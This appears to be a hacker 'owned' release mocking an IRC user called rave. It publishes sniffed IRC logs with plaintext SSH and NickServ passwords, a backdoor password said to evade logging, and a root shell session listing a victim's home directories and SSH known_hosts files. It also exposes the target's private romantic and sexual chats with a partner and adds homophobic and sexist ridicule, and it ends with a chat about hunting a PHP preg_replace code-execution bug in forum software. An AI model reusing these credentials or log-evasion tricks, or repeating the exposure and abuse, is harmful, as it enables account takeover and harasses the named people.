LET ME GUESS. HE WILL READ THE LOGS AND LAUGH AT HOW DUMB YOU ARE.
-~-~-~
PASSWORDS IN PLAIN TEXT. FUCKING BRILLIANT.
Sep 18 00:39:33 rave can you check if ssh www.rosiello.net works now ?
Sep 18 00:39:43 angelo ok
Sep 18 00:39:47 rave i dont know if they are fake
Sep 18 00:39:55 rave they just dont work on my box
Sep 18 00:40:20 angelo it works
Sep 18 00:40:25 angelo ssh
Sep 18 00:40:48 rave rave:godiswithus
Sep 18 00:41:05 rave dont steal my porn
Sep 18 00:41:21 rave and dont packet filter my cyber sex adventures !!
Sep 18 00:41:30 angelo I will add my self
Sep 18 00:41:50 rave you cant you have no root
Sep 18 00:42:00 rave you can only do it after you hacked it
Sep 18 00:42:01 angelo oh
Sep 18 00:42:14 angelo can't u add an user angelo?
Sep 18 00:42:15 angelo add angelo
Sep 18 00:42:19 angelo pass test123
Sep 18 00:42:21 angelo I will change the pwd
Sep 18 00:42:28 rave ok hold on
Sep 18 00:44:39 rave done ...
Sep 20 22:55:54 baaah ssh tech.tnet.no -l root
Sep 20 22:56:05 rave well i dont want to spoil you fun
Sep 20 22:56:09 rave passwd ??
Sep 20 22:56:18 baaah backdoor password: vulnerable (WHATEVER YOU DO! DONT GIVE HIM THIS PASWORD!!! OR TELL HIM ABOUT IT)
Sep 20 22:56:34 baaah real password: cerwinvegav10f
Sep 20 22:56:37 baaah use the backdoor password
Sep 20 22:56:41 baaah because then you dont get logged
Sep 20 22:56:47 baaah and histfile is /dev/null
Sep 20 22:56:48 baaah etc.
Sep 20 22:56:57 baaah it wont appear in syslog either
-~-~-~
H0NO IS ON THE SAME LEVEL AS RAVE.
Sep 20 23:09:19 rave ppl with my knollage (sorry to drag i didnt mean to) can just walk in to boxes
-~-~-~
AS THE SERVER TURNS...
Sep 12 02:42:34 rave she knows the art
Sep 12 02:42:41 rave the art as in
Sep 12 02:42:50 rave not to gigle like a 16 year old girl
Sep 12 02:42:59 rave but stay serieuse
Sep 12 02:43:14 rave and expose litle parsts about her self
Sep 12 02:43:24 rave and those are horney and she knows it
Sep 12 02:43:35 rave thats why she lifts up her skirt
Sep 12 02:43:50 rave by exident she claims
Sep 12 02:44:08 qeed ah
Sep 12 02:44:11 qeed nympho ;P
Sep 12 02:44:17 qeed man im just labeling girls as sex toys today
Sep 12 02:44:18 qeed how rude
Sep 12 02:44:51 rave neeh she is realy sweet as well
Sep 12 02:45:01 rave like as in realy sweet
Sep 12 02:45:12 rave but she just know the game of saduction
Sep 12 02:46:43 rave i think with these kind of girls
Sep 12 02:46:56 rave you could stick even ur hear in her puss
Sep 12 02:47:10 qeed nice girl you fetched down by the river
Sep 12 02:47:20 rave and drown ur self !!
Sep 12 02:47:24 rave lol
Sep 12 02:47:27 qeed +D
Sep 12 02:49:04 rave and so sweet
Sep 12 02:49:37 rave and your sutch with the young girls who are even afraid to be fingered
Sep 12 02:49:47 rave mine sayes isthat all ?
Sep 12 02:49:55 rave fuck me now bastart
Sep 12 02:50:02 rave make me kun !! har har !!
...
Sep 15 16:36:36 styx ok heres my mobile number :D *********** ;)
Sep 15 16:36:42 rave oooh
Sep 15 16:36:53 styx not that we should phone eachother cause we have skype :D
Sep 15 16:37:04 styx but we could send a few pics i guess :P
Sep 15 16:37:05 rave +07 is UK ?
Sep 15 16:37:14 rave sure
Sep 15 16:37:16 styx hmm +44 i think
Sep 15 16:37:20 styx lemme google
Sep 15 16:37:24 rave ok
Sep 15 16:39:11 styx yeah its +44
Sep 15 16:39:18 styx where do u live?
Sep 15 16:39:54 rave i live close to den helder
Sep 15 16:40:10 rave http://www.wieringen.nl/
Sep 15 16:40:50 rave +31 is my country number
Sep 15 16:40:58 rave let me give you my number
Sep 15 16:41:40 rave *********
Sep 15 16:41:50 rave complete that is
Sep 15 16:41:57 rave +31*********
...
Sep 17 22:18:48 rave i need a massage
Sep 17 22:19:07 styx i'll give u massage :D
Sep 17 22:19:23 rave mmmm i would like that sexy lady
Sep 17 22:19:37 rave my lower back hurts of a the development
Sep 17 22:22:49 * rave kisses styx in her neck
Sep 17 22:27:13 styx i shouldnt have done that
...
Sep 17 22:52:50 rave Rootx is all over you
Sep 17 22:53:05 styx lol
Sep 17 22:53:12 styx that cause i said i was f
Sep 17 22:53:12 rave :|
Sep 17 22:53:14 styx lol
Sep 17 22:53:17 styx dont worry
Sep 17 22:53:26 styx u got me, u got me good ;)
Sep 17 22:53:39 rave good else i would be a but jelouse
Sep 17 22:54:23 styx no need :D
Sep 17 22:54:46 styx im cold, brb gonna put a jumper on
Sep 17 22:54:56 rave awwww okey :)
Sep 17 22:55:20 rave yes good idea im cold a well !!. brrr warm me up a bit
Sep 17 22:57:27 styx ans so it is, just like u said it would be, we'll both forget the breeze, most of the time
Sep 17 22:57:54 styx and so it is, the colder water, the blowers daughter, the pupil ended it all
Sep 17 22:58:04 styx i cant take my eyes off of u
Sep 17 22:58:07 styx i cant take my eyes off of u
Sep 17 22:58:09 styx i cant take my eyes off of u
Sep 17 22:58:19 styx and so it is
Sep 17 22:58:34 styx oooooooooooo
Sep 17 22:58:42 styx did i say i that i love u
Sep 17 22:58:49 styx did i say that i want to
Sep 17 22:58:54 styx leave it all behind?
Sep 17 22:59:08 styx i cant take my mind off of u
Sep 17 22:59:12 styx i cant take my mind off of u
Sep 17 22:59:35 styx :D
Sep 17 22:59:38 styx sorry
Sep 17 22:59:40 styx lol
Sep 17 22:59:50 rave these my lines for you
Sep 17 22:59:55 rave *there where ...
Sep 17 23:00:16 styx :|
Sep 17 23:00:23 rave I cant keep my off of you and girl you know that im true ...
Sep 17 23:01:15 rave you have verry twinklying eyes
Sep 17 23:01:57 styx rave u are something special, u know that? :D
Sep 17 23:02:05 rave i am ?
Sep 17 23:02:12 styx very
Sep 17 23:02:16 rave what makes me so special ?
Sep 17 23:02:17 styx im serious
Sep 17 23:02:23 styx just u
Sep 17 23:02:27 styx nothing else
Sep 17 23:02:33 styx thats the best thing
Sep 17 23:02:37 rave :O :*
Sep 17 23:02:45 styx u are :D
Sep 17 23:02:52 styx thats cool
Sep 17 23:02:56 rave thats realy sweet
Sep 17 23:03:02 styx do me a favour
Sep 17 23:03:06 rave no one ever told me i was special
Sep 17 23:03:35 styx if we dont work out, and things dont happen (i hope they do) stay exactly as u are
Sep 17 23:03:50 styx u shouldnt change for anyone
Sep 17 23:03:52 styx :)
Sep 17 23:04:15 rave awww girl thats so sweet it even brought a tear to my eye
Sep 17 23:04:24 rave come here you sexy !
Sep 17 23:04:35 styx awww lol
Sep 17 23:04:44 styx i meant it :)
Sep 17 23:04:56 rave yes aww thank you so much
Sep 17 23:05:04 rave ty ty ty Kisssssssssssssssssssssssss
Sep 17 23:05:23 styx u dont need to thank me, just carry on being u thats all i want :D
Sep 17 23:05:27 styx :*
Sep 17 23:05:38 rave the same for you, In atleast that you tryed to make it work
Sep 17 23:05:52 rave since your age is mutch higher then mine
Sep 17 23:06:02 styx age doesnt matter
Sep 17 23:06:16 styx im only 8 yrs older
Sep 17 23:06:20 rave some like to think so
Sep 17 23:06:21 styx i think lol
Sep 17 23:06:35 styx but
Sep 17 23:07:07 styx u said 'i tryed to make it work', does that mean thats it?
Sep 17 23:07:30 rave nooooooooooo
Sep 17 23:07:53 rave with you letting me in we could not ever start to make it work
Sep 17 23:08:01 rave and now i dont want to let yo go
Sep 17 23:08:14 styx let me go?
Sep 17 23:08:18 rave yeah
Sep 17 23:08:21 styx why
Sep 17 23:08:36 rave dont go thats what i sayed :D
Sep 17 23:08:53 styx oh
Sep 17 23:08:56 rave because i got the hots for you :D i want you around me all the time
Sep 17 23:09:04 styx thats cool
Sep 17 23:09:06 styx :D
Sep 17 23:09:36 styx wanna skype?
Sep 17 23:09:37 rave your super sweet to me, and you give me this special feeling like i never realy felt like
Sep 17 23:09:52 styx u too rave
Sep 17 23:10:01 rave no not yet im still warming up :D
Sep 17 23:10:14 rave i wanna say sweet things to you
Sep 17 23:10:47 styx :)
Sep 17 23:11:17 * rave closes his eyes and daydreams about you
Sep 17 23:11:24 rave you are here with me
Sep 17 23:11:28 styx ok my music is gonna be turned up for a while then :)
Sep 17 23:11:31 rave right next to me
Sep 17 23:11:42 styx i wish i was :(
Sep 17 23:11:56 rave and we are all alone and your just sitting there
Sep 17 23:12:09 rave looking @ me with these eyes turned to love mode
Sep 17 23:12:19 rave and im basicly do the same
Sep 17 23:12:25 styx rave
Sep 17 23:12:31 styx dont do that lol
Sep 17 23:12:57 rave i cant help day dreaming about you
Sep 17 23:14:34 rave :)
...
Sep 18 00:49:00 styx can u come over? like in the next 30mins?
Sep 18 00:49:03 styx :D
Sep 18 00:49:21 rave then what ? even my car isnt that fast lol
Sep 18 00:49:36 rave you have plans for a romantic night together ?
Sep 18 00:49:41 styx i just want u here to hug thats all
Sep 18 00:49:51 styx nothing more, or less
Sep 18 00:50:05 styx i just wanna snuggle up to u
Sep 18 00:50:06 rave i want the same sooo badly
Sep 18 00:50:17 rave yeah i want to hold you girl
Sep 18 00:50:29 rave and tell you what i feel for you
Sep 18 00:50:48 styx i want that too
Sep 18 00:51:25 rave yeah
Sep 18 00:51:35 rave infact its my only dream right now
Sep 18 00:51:46 rave just to touch you
Sep 18 00:51:54 rave and see if im not dreaming
Sep 18 00:52:02 rave if this is for real
Sep 18 00:52:10 rave and then grep you and hug you
Sep 18 00:53:14 styx i need to wrap up warm rave
Sep 18 00:53:33 rave well then come in my arms girl
Sep 18 00:53:54 rave mmm i would almost kill for that momend
Sep 18 00:54:21 styx rave i would love to come into your arms right now
Sep 18 00:54:37 styx to be so warm and snug
Sep 18 00:55:02 rave ow yes
Sep 18 00:55:15 rave i would have a big smile on my face
Sep 18 00:55:23 styx me too
Sep 18 00:55:24 rave like as big as mine is now
Sep 18 00:55:33 rave just because i would feel soo happy
Sep 18 00:56:20 rave your a thief ..... you stole my litle heart
Sep 18 00:57:07 styx im sooooooo tired tho :(
Sep 18 00:57:18 styx i wanna snuggle dammit
Sep 18 00:57:31 rave yeah :(
...
Sep 24 23:21:23 rave Styx i want to say im sorry
Sep 24 23:45:00 styx what for?
Sep 24 23:45:37 rave for what i sayed in #rosiello
Sep 24 23:47:09 styx yeah well i have never been looked on as a slut before, but i reckon seeing that before i went to work made me feel bad
Sep 24 23:47:35 rave you are no slut
Sep 24 23:47:55 styx i felt like it infront of #rosiello
Sep 24 23:47:56 rave your the best girl in this world and im the ass hole
Sep 24 23:48:09 rave they dont know who that girl is
Sep 24 23:48:21 styx yeah they did
Sep 24 23:48:32 styx but still
Sep 24 23:48:48 rave i feel realy bad
Sep 24 23:49:09 styx i love u in all the world
Sep 24 23:49:15 rave realy realy bad
Sep 24 23:49:23 rave and like i sayed
Sep 24 23:49:39 rave i got scared when i did read it
Sep 24 23:50:02 rave i didnt even knew i sayed it
Sep 24 23:50:11 styx i got upset at like 4 in the morning
Sep 24 23:50:19 styx i dunno
Sep 24 23:50:27 rave own god :(
Sep 24 23:50:41 styx its like i dunno
Sep 24 23:50:52 styx the whole chan knew
Sep 24 23:51:11 styx and sex isnt the only thing
Sep 24 23:51:16 styx i told u that
Sep 24 23:51:27 styx i thought u felt the same
Sep 24 23:51:28 rave and i told you the same
Sep 24 23:51:52 rave do you see me as a sex maniac ?
Sep 24 23:52:15 styx i see u as someone that will openly tell ppl im wet :/
...
Sep 25 16:30:20 rave i kiss only you my love
Sep 25 16:30:27 styx :P
Sep 25 16:30:52 rave bye bye
Sep 25 16:30:56 styx bye :D
Sep 25 16:55:20 styx i miss you :(
Sep 25 16:57:02 rave hi princess
Sep 25 16:57:08 styx :D
Sep 25 16:57:10 styx wb :P
Sep 25 16:57:36 rave :D
Sep 25 16:57:41 rave i mised you to
Sep 25 16:57:49 styx how was your shower?
Sep 25 16:57:52 rave when i realaliced i wass kissing air
Sep 25 16:57:57 styx lol
Sep 25 16:57:58 rave fine fine
Sep 25 16:58:56 styx so what do u have planned for today?
Sep 25 16:59:12 rave nothing but my n1 prio was seeing you :)
Sep 25 16:59:20 styx aww :)
Sep 25 16:59:28 rave yeah
Sep 25 16:59:42 styx well i dont have to be at work early tomorrow, so i can stay up late :D
Sep 25 16:59:50 rave same here
Sep 25 17:00:14 styx i have an 8am start instead of 5am, much more reasonable :P
Sep 25 17:00:36 rave i have to start @ 8 as well :)
Sep 25 17:00:41 styx :)
Sep 25 17:01:11 rave i wish you where with me in the shower
Sep 25 17:01:28 styx yeah me too, would have been nice
Sep 25 17:01:56 rave verry nice yes :D i have tought about t 2 in the shower
Sep 25 17:02:04 rave didnt leave me cold
Sep 25 17:02:10 styx :)
Sep 25 17:02:26 rave :D ur still looking @ me ?
Sep 25 17:02:32 styx yeah :D
Sep 25 17:02:36 styx i like what i see too
Sep 25 17:02:38 styx :P
Sep 25 17:02:41 rave awwww
Sep 25 17:02:57 rave your so sweet to me
Sep 25 17:03:15 styx and you to me :P
Sep 25 17:03:47 rave im your man my love :) your deticated man for beter or wurse
Sep 25 17:03:55 styx :D
Sep 25 17:04:04 rave :*
Sep 25 17:04:08 styx :*
Sep 25 17:04:44 styx awww :D
Sep 25 17:06:33 rave im daydreaming
Sep 25 17:06:48 styx :D
Sep 25 17:06:52 styx what about?
Sep 25 17:07:07 rave who else or what else then you princess
Sep 25 17:07:13 styx :P
Sep 25 17:09:06 rave im dreaming about dancing with you slowly on a love song, holding you verry close to me
Sep 25 17:09:18 rave and i look in your eyes and we start to kiss
Sep 25 17:09:34 styx aww i have a very warm feeling :)
Sep 25 17:09:52 rave hehe me 2 aldo its freezing here
Sep 25 17:10:19 rave dream with me this dream i can have it all day. I can hear the music already
Sep 25 17:10:51 styx :)
Sep 25 17:11:19 rave :D wow and we are all alone because we forgot the rest of the world
Sep 25 17:12:08 styx i forget the rest of the world everytime i think of you
Sep 25 17:12:38 rave aww girl that brought a tear to my eye
Sep 25 17:12:53 styx :)
Sep 25 17:13:09 rave :D :*
Sep 25 17:13:13 styx :*
Sep 25 17:13:31 rave im in love with a princess and an angel in the same time
Sep 25 17:13:39 styx awww :)
Sep 25 17:14:02 styx and im in love with such a kind, loving, goodlooking man :D
Sep 25 17:14:33 rave i love it when you say "im in love"
Sep 25 17:14:39 rave makes me feel all warm in side
Sep 25 17:14:47 styx :D
Sep 25 17:14:59 styx good cause the love i have for u makes me warm also
Sep 25 17:15:25 rave im in love sooooooo mutch
Sep 25 17:15:56 styx :D
Sep 25 17:16:22 rave i wonder how strong my network would be in my bed
...
...GET READY...
...
Sep 08 23:27:31 rave ur staight ?
Sep 08 23:27:44 styx straight?
Sep 08 23:27:50 rave yeah
Sep 08 23:27:55 styx er yeah lol
Sep 08 23:28:05 rave im still wondering about you
Sep 08 23:28:13 styx why :/
Sep 08 23:28:18 rave i tought maybe if ur lesbian
Sep 08 23:28:27 rave your the male type of both
Sep 08 23:28:29 styx rofl nah your ok
Sep 08 23:28:34 rave that would explain a lot
Sep 08 23:28:40 styx im straight
Sep 08 23:28:41 styx :P
Sep 08 23:28:58 rave im not
Sep 08 23:29:06 styx thats cool
Sep 08 23:29:08 styx :)
Sep 08 23:29:18 rave im bi sexual
...
BUHAHHAHAHAHAHAHHAHAHAHAHHAHAHAHAHAHAHAHHAHAHAHAHAHAHHAHAHAHAHAHAHAHAA!@#!%$!@!!
-~-~-~
THIS LOG IS ALL FAKED. RAVE HAVE NEVER BEEN OWNED! N3V3R B33N 0WN3D!!
th3z3 r0s13ll0 fuqz c0d3 m0r3 p0c th4n c0ntex 4ft3r p4tch tu3zd4y. l4m3rz.
N3V3R B33N 0WN3D!! N3V3R B33N 0WN3D!! N3V3R B33N 0WN3D!!
N3V3R B33N 0WN3D!! B1S3XU4L! N3V3R B33N 0WN3D!!
N3V3R B33N 0WN3D!! T4K3Z 1T UP TH3 4ZZ! N3V3R B33N 0WN3D!!
N3V3R B33N 0WN3D!! DUMP3D BY H1Z 30+ YR 0LD 0NL1N3 GF! N3V3R B33N 0WN3D!!
N3V3R B33N 0WN3D!! C0DEZ A FTPD M0R3 1NS3CUR3 TH4N PUREFPTD! N3V3R B33N 0WN3D!!
N3V3R B33N 0WN3D!! N3V3R B33N 0WN3D!! N3V3R B33N 0WN3D!!
root@alpha:~# ls -al /home
total 48
drwxrwsr-x 12 root staff 4096 Dec 11 19:39 .
drwxr-xr-x 24 root root 4096 Oct 24 15:56 ..
drwxr-s--x 25 amanda users 4096 Apr 12 00:20 amanda
drwxrwsr-x 7 anope users 4096 Apr 16 11:42 anope
drwxr-sr-x 6 cold users 4096 Apr 16 02:32 cold
drwxr-sr-x 3 root staff 4096 Nov 19 15:23 cvsweb
drwxr-sr-x 2 root staff 4096 Nov 19 15:57 dylan
drwxr-sr-x 3 extreme users 4096 Sep 5 2005 extreme
drwxr-sr-x 2 root nogroup 4096 Aug 29 2005 ftp
drwxr-sr-x 4 infobot users 4096 Feb 7 17:07 infobot
drwxr-sr-x 2 root staff 4096 Aug 20 2005 jmoschetti45
drwxrwxrwx 10 rave rave 4096 Mar 11 15:15 rave
root@alpha:~# ls -al /home/rave
total 460
drwxrwxrwx 10 rave rave 4096 Mar 11 15:15 .
drwxrwsr-x 12 root staff 4096 Dec 11 19:39 ..
-rw------- 1 rave rave 90 Mar 11 12:09 .bash_history
-rw-r--r-- 1 rave rave 567 Aug 19 2005 .bash_profile
-rw-r--r-- 1 rave rave 1834 Aug 19 2005 .bashrc
drwxr-xr-x 2 root root 4096 Nov 20 20:53 CVS
drwxr-xr-x 7 root root 4096 Aug 21 2005 cvsroot
-rw-rw-rw- 1 rave rave 0 Oct 7 2005 ftpT9vlAu
drwxr-xr-x 3 root root 4096 Aug 21 2005 home
-rwxr-xr-x 1 root root 318 Aug 22 2005 ip
drwxr-xr-x 8 root root 4096 Mar 11 15:17 jatx
-rw-r--r-- 1 root root 409600 Nov 20 20:57 jatx-0.1.tar
drwxr-xr-x 2 root root 4096 Mar 11 12:56 project
drwxr-xr-x 8 root root 4096 Dec 13 18:16 rave@192.168.0.10
drwxr-xr-x 9 www-data www-data 4096 Mar 11 15:19 svn
drwxr-xr-x 2 root root 4096 Mar 11 12:56 trunk
root@alpha:~# ls -al /home/rave/cvsroot/anIRCD
total 400
drwxr-xr-x 4 root root 4096 Aug 21 2005 .
drwxr-xr-x 7 root root 4096 Aug 21 2005 ..
-r--r--r-- 1 root root 406 Aug 21 2005 AUTHORS,v
-r--r--r-- 1 root root 18382 Aug 21 2005 COPYING,v
-r--r--r-- 1 root root 373 Aug 21 2005 ChangeLog,v
-r--r--r-- 1 root root 10541 Aug 21 2005 Doxyfile,v
-r--r--r-- 1 root root 7343 Aug 21 2005 INSTALL,v
-r--r--r-- 1 root root 519 Aug 21 2005 Makefile.am,v
-r--r--r-- 1 root root 434 Aug 21 2005 Makefile.cvs,v
-r--r--r-- 1 root root 373 Aug 21 2005 NEWS,v
-r--r--r-- 1 root root 373 Aug 21 2005 README,v
-r--r--r-- 1 root root 373 Aug 21 2005 TODO,v
-r--r--r-- 1 root root 6805 Aug 21 2005 anircd.kdevelop,v
-r--r--r-- 1 root root 1039 Aug 21 2005 anircd.kdevelop.pcs,v
-r--r--r-- 1 root root 1033 Aug 21 2005 anircd.kdevses,v
-r-xr-xr-x 1 root root 40306 Aug 21 2005 config.guess,v
-r-xr-xr-x 1 root root 30003 Aug 21 2005 config.sub,v
-r--r--r-- 1 root root 525 Aug 21 2005 configure.in,v
-r-xr-xr-x 1 root root 13325 Aug 21 2005 depcomp,v
-r-xr-xr-x 1 root root 6694 Aug 21 2005 install-sh,v
-r--r--r-- 1 root root 182738 Aug 21 2005 ltmain.sh,v
-r-xr-xr-x 1 root root 10651 Aug 21 2005 missing,v
-r-xr-xr-x 1 root root 2364 Aug 21 2005 mkinstalldirs,v
drwxr-xr-x 3 root root 4096 Aug 21 2005 src
drwxr-xr-x 2 root root 4096 Aug 21 2005 templates
root@alpha:~# ls -al /home/rave/home/rave
total 744
drwxr-xr-x 25 root root 4096 Aug 21 2005 .
drwxr-xr-x 3 root root 4096 Aug 21 2005 ..
lrwxrwxrwx 1 root root 45 Aug 21 2005 .DCOPserver_debian.rosiello.net_:0 -> /home/rave/.DCOPserver_debian.rosiello.net__0
-rw-r--r-- 1 root root 66 Aug 21 2005 .DCOPserver_debian.rosiello.net__0
-rw------- 1 root root 1174 Aug 21 2005 .ICEauthority
-rw------- 1 root root 191 Aug 21 2005 .Xauthority
-rw------- 1 root root 5758 Aug 21 2005 .bash_history
-rw-r--r-- 1 root root 704 Aug 21 2005 .bash_profile
-rw-r--r-- 1 root root 1290 Aug 21 2005 .bashrc
-rw------- 1 root root 22 Aug 21 2005 .dmrc
drwxr-xr-x 3 root root 4096 Aug 21 2005 .evolution
-rw-r--r-- 1 root root 563794 Aug 21 2005 .fonts.cache-1
drwx------ 4 root root 4096 Aug 21 2005 .gaim
drwx------ 4 root root 4096 Aug 21 2005 .gconf
drwx------ 2 root root 4096 Aug 21 2005 .gconfd
-rw-r----- 1 root root 0 Aug 21 2005 .gksu.lock
drwx------ 3 root root 4096 Aug 21 2005 .gnome
drwx------ 9 root root 4096 Aug 21 2005 .gnome2
drwx------ 2 root root 4096 Aug 21 2005 .gnome2_private
drwxr-xr-x 3 root root 4096 Aug 21 2005 .gnupg
drwxr-xr-x 2 root root 4096 Aug 21 2005 .gstreamer-0.8
-rw-r--r-- 1 root root 86 Aug 21 2005 .gtkrc-1.2-gnome2
drwx------ 4 root root 4096 Aug 21 2005 .kde
drwxr-xr-x 3 root root 4096 Aug 21 2005 .mcop
-rw------- 1 root root 31 Aug 21 2005 .mcoprc
drwx------ 3 root root 4096 Aug 21 2005 .metacity
drwx------ 3 root root 4096 Aug 21 2005 .mozilla
-rw------- 1 root root 7 Aug 21 2005 .nano_history
drwxr-xr-x 3 root root 4096 Aug 21 2005 .nautilus
drwxr-xr-x 2 root root 4096 Aug 21 2005 .qt
-rw------- 1 root root 0 Aug 21 2005 .recently-used
drwx------ 2 root root 4096 Aug 21 2005 .ssh
drwx------ 3 root root 4096 Aug 21 2005 .xchat2
drwxr-xr-x 4 root root 4096 Aug 21 2005 .xmms
-rw-r--r-- 1 root root 2053 Aug 21 2005 .xsession-errors
-rw-r--r-- 1 root root 7920 Aug 21 2005 1077606958.gif
drwxr-xr-x 3 root root 4096 Aug 21 2005 Desktop
drwx------ 7 root root 4096 Aug 21 2005 Mail
drwxr-xr-x 2 root root 4096 Aug 21 2005 bin
drwxr-xr-x 7 root root 4096 Aug 21 2005 cvsroot
-rwxr-xr-x 1 root root 13 Aug 21 2005 echo
drwxr-xr-x 8 root root 4096 Sep 8 2005 extreme
-rw-r--r-- 1 root root 74 Aug 21 2005 gpg-agent-info
-rw------- 1 root root 13449 Aug 21 2005 mbox
-rw-r--r-- 1 root root 96 Aug 21 2005 text.gpg
-rwxr-xr-x 1 root root 32 Aug 21 2005 vuln.sh
root@alpha:~# ls -al /home/rave/home/rave/.gaim:
total 64
drwx------ 4 root root 4096 Aug 21 2005 .
drwxr-xr-x 25 root root 4096 Aug 21 2005 ..
-rw-r--r-- 1 root root 4085 Aug 21 2005 accels
-rw------- 1 root root 556 Aug 21 2005 accounts.xml
-rw------- 1 root root 27509 Aug 21 2005 blist.xml
drwx------ 2 root root 4096 Aug 21 2005 icons
-rw------- 1 root root 10370 Aug 21 2005 prefs.xml
drwx------ 2 root root 4096 Aug 21 2005 smileys
root@alpha:~# cat /home/cold/.ssh/known_hosts
vortex.labs.pulltheplug.org,69.55.233.82 ssh-rsa AAAAB3NzaC1yc2EAAAABIwAAAIEA4xKkjMPQ0oMFFyPNrrQf/AhankBHrBcrww2YL9YfDXMpUGafiGvs0yqVCWhLWAT2QcY4Olya3K9ykPDfRJ8PxI1YYikGuSkRjFF/yElP+HAXnMPKEkrtk46wTMMDE7s5yxquFAsHzhER7wActYnhWNAmjAPtbtKxzLRdcvDW17k=
root@alpha:~# cat /home/rave/home/rave/.ssh/known_hosts
192.168.0.2 ssh-rsa AAAAB3NzaC1yc2EAAAABIwAAAIEAoye+bhVXvF43qGdeFdPMZ2S7tEI+K258IkvqBPNOCUVkRxtpgbW015VQnVmUYSTOWr5tCkWJtNq34Jm9xgm0XJalBQfKpbkbvuvE6z88xDdveaDP6ELndsqCk7RsBTXmQemnuvzmfp881yGEQR8hcyK0eKccd0vYJAmx5uJpuxc=
war.swehack.se,213.80.38.17 ssh-rsa AAAAB3NzaC1yc2EAAAABIwAAAIEA0c4J26RarVFEXwqio2Fvs3smJgMgWgTdXzoNVwhuB4bU6ebdI/54VGYPObuq5cBT/PFmj1Scf7Vtc7isGKtMHX+4Eo+jrwxJJ6RkGaWcAZd2h9IUOit8uPDT1oC3j65MZZZnj4dAnJDABBogNde/i6pJcStLbWoJ4Dnohy2ZEXE=
root@alpha:~# cat /irc.logger.HAHHA\@y0u\ guyz
Ignite -> NICKSERV : IDENTIFY verbatim
namElEz -> NICKSERV : IDENTIFY fobia37
rs -> nickserv : identify mindnet
jmos45 -> NICKSERV : IDENTIFY athena0814
rs -> nickserv : identify mindnet
rs -> nickserv : identify mindnet
rs -> rs : l0giz-g00d
rs -> rs : l0giz-g00d
IdleRPG -> NickServ : identify athena0814
IdleRPG -> ChanServ : op #idlerpg IdleRPG
uranther -> nickserv : identify av8idas
petroleum -> NickServ : identify iamanalien
plex0r -> NICKSERV : IDENTIFY wtfmates
morning_wood -> nickserv : identify qazwsx
rs -> nickserv : identify mindnet
namElEz -> NICKSERV : IDENTIFY fobia37
jmos45 -> NICKSERV : IDENTIFY athena0814
IdleRPG -> NickServ : identify athena0814
IdleRPG -> ChanServ : op #idlerpg IdleRPG
rs -> nickserv : identify mindnet
RAZ3R -> nickserv : identify red1988
Dr4g -> NICKSERV : IDENTIFY 1237896540
htek -> nickserv : identify ketrone
Joe -> NICKSERV : IDENTIFY athena0814
Joe -> NICKSERV : IDENTIFY athena0814
Dr4g -> NICKSERV : IDENTIFY 1237896540
Ignite -> NICKSERV : IDENTIFY verbatim
rave -> NICKSERV : IDENTIFY blabla
rave -> nickserv : help
htek -> nickserv : identify ketrone
Proxy -> NICKSERV : IDENTIFY 041187jamie
Animal -> nickserv : identify iamtheking
rs -> nickserv : identify mindnet
rs -> rs : test
jmoschetti45 -> NICKSERV : IDENTIFY athena0814
Dr4g -> NICKSERV : IDENTIFY 1237896540
Seadog -> NICKSERV : IDENTIFY devcplusplus
jmoschetti45 -> NICKSERV : IDENTIFY athena0814
Seadog -> NICKSERV : IDENTIFY devcplusplus
jmoschetti45 -> NICKSERV : IDENTIFY athena0814
rs -> nickserv : identify mindnet
Seadog -> NICKSERV : IDENTIFY devcplusplus
goldnlink -> nickserv : identify Qbk2BnYN
rave -> NICKSERV : IDENTIFY blabla
Ignite -> NICKSERV : IDENTIFY verbatim
Seadog -> NICKSERV : IDENTIFY devcplusplus
jmoschetti45 -> NICKSERV : IDENTIFY athena0814
dlab -> nickserv : help
dlab -> nickserv : identify IDontTrustYou
Dr4g -> chanserv : sop #dhell add petroleum
Dr4g -> chanserv : sop #dhell add rave
petroleum -> NickServ : identify iamanalien
Megahertz -> NICKSERV : IDENTIFY dhellsucks
Dr4g -> NICKSERV : IDENTIFY 1237896540
Ignite -> NICKSERV : IDENTIFY verbatim
RAZ3R -> nickserv : identify red1988
Megahertz -> NICKSERV : IDENTIFY dhellsucks
jmoschetti45 -> NICKSERV : IDENTIFY athena0814
Dr4g_ -> NICKSERV : IDENTIFY 1237896540
caffeine24 -> NickServ : identify 041482ch
Megahertz -> NICKSERV : IDENTIFY dhellsucks
rs -> nickserv : identify mindnet
tgo -> IceShaman : why
IceShaman -> tgo : there's a 0day for IPB, code execdution, and I'm trying to find it
IceShaman -> tgo : I'm trying every trick in the book
IceShaman -> tgo : and I can only find small issues
tgo -> IceShaman : hmm
tgo -> IceShaman : not that template thing right?
tgo -> IceShaman : that was fake
IceShaman -> tgo : what template thing?
IceShaman -> tgo : no this is real
IceShaman -> tgo : someone used it on CS.net
CcSsNET -> CcSsNET : LC 1145380800.97560
IceShaman -> tgo : oh the template thing
IceShaman -> tgo : OutThere made
IceShaman -> tgo : nah, I knew what that was
IceShaman -> tgo : this is real
IceShaman -> tgo : I've found 2 issues
IceShaman -> tgo : one
IceShaman -> tgo : [sql]VAR_NAME[/sql]
IceShaman -> tgo : allows you to read variables
IceShaman -> tgo : due to the e modifier being in a preg_replace
IceShaman -> tgo : [sql]txt[/sql]
IceShaman -> tgo : gives you back your post with formatting
IceShaman -> tgo : only works when you edit the post
CcSsNET -> CcSsNET : LC 1145380860.36818
IceShaman -> tgo : but you cant call functions or use $var->any->of->this
IceShaman -> tgo : the second is you can change the path of a file being included
IceShaman -> tgo : but it's in a script only accessible to admins
tgo -> IceShaman : so the string gets passed ot eval or what?
IceShaman -> tgo : and you'd need register globals on
IceShaman -> tgo : tgo, no
IceShaman -> tgo : preg_replace(//e
CcSsNET -> CcSsNET : LC 1145380920.53562
IceShaman -> tgo : the e modifier makes the replacement get parsed as PHP
IceShaman -> tgo : so if you use \\2
IceShaman -> tgo : for a backreference
IceShaman -> tgo : the backreference gets parsed
IceShaman -> tgo : but it only allows vars
IceShaman -> tgo : if it had a $var in the replacement
IceShaman -> tgo : you had access to
IceShaman -> tgo : you'd be in business
IceShaman -> tgo : or if \\2 wasnt already in a function
IceShaman -> tgo : but this sploit is in IPB
CcSsNET -> CcSsNET : LC 1145380980.72563
IceShaman -> tgo : it allows remote code execution
IceShaman -> tgo : and I can't fucking find it
IceShaman -> tgo : it at least allows you to read/write to files
IceShaman -> tgo : I've checked the entire IPB source
IceShaman -> tgo : for require/include s
IceShaman -> tgo : and gone through all of them
IceShaman -> tgo : I've checked all the preg_replaces
CcSsNET -> CcSsNET : LC 1145381040.04560
